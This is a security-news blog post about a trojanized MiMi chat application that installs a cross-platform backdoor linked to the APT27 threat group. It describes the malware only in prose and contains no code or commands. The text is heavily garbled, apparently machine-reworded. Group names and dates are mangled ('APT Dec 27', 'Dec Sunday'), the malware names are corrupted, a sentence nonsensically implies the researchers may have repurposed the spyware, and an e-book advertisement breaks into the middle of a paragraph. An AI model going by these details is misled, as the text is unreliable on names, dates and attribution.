KEEPNET LABS > Blog > Chinese Hackers Backdoor Chat App to Steal Data From Windows, Linux & macOS

Chinese Hackers Backdoor Chat App to Steal Data From Windows, Linux & macOS

Researchers uncovered a Trojan horse version of Mimi that is primarily focused on the Chinese market. This malware is cross-platform and can be used on many platforms. There are links between this malware and the Chinese-backed threat group APT Dec 27, researchers say.

Chinese Hackers Backdoor Chat App to Steal Data From Windows, Linux & macOS

Dec Sunday, SEKOIA cybersecurity researchers recently uncovered a Trojan horse version of Mimi that is primarily focused on the Chinese market, but is also cross-platform and can be used on many platforms. The Trojan horse version of Mimi created a new backdoor known as shell, which is capable of stealing data from the following platforms: – Linux macOS, after installing version 2.3 for about four months. It was found that 0 application backdoors are installed on macOS. This was revealed when the team scanned the C2 infrastructure for Hyperbroken malware and noticed irregular links to this application.

Although the most interesting thing about this malware is that there are several links between this malware and the Chinese-backed threat group APT Dec 27 (emissary Panda, Iron Tiger, and LuckyMouse). Also, read Zero-a radical simplification of cyber security over a secure network – a free e-book MiMi source code, before entering malicious code malicious JavaScript code that checks whether an application is running on a device that has been infected with Mac. After that, the Trojan will download and operate the backdoor of the shell. Version 2.3 on May 26, 2022. 0 from Mimi. the app was released with the Trojan horse.” Mimi. application / Content / Resources/application/email is the main page. JS” file. After the malware is executed and deployed, the malware collects and sends system information to the C2 server to communicate with the apt27 threat actors who are waiting for their commands. Using this application, attackers can browse folders and files on compromised systems and open them using the processes of reading, downloading, and writing files.

It is also equipped with a very useful download command that can tell the backdoor to download files to the server on which the backdoor is installed. For now, there is no way to determine whether SEKOIA reused this application to a spyware application to collect data from a spyware application or not.

Join
Our Newsletter

Sign up to learn about the latest threats, hacking methods, and news.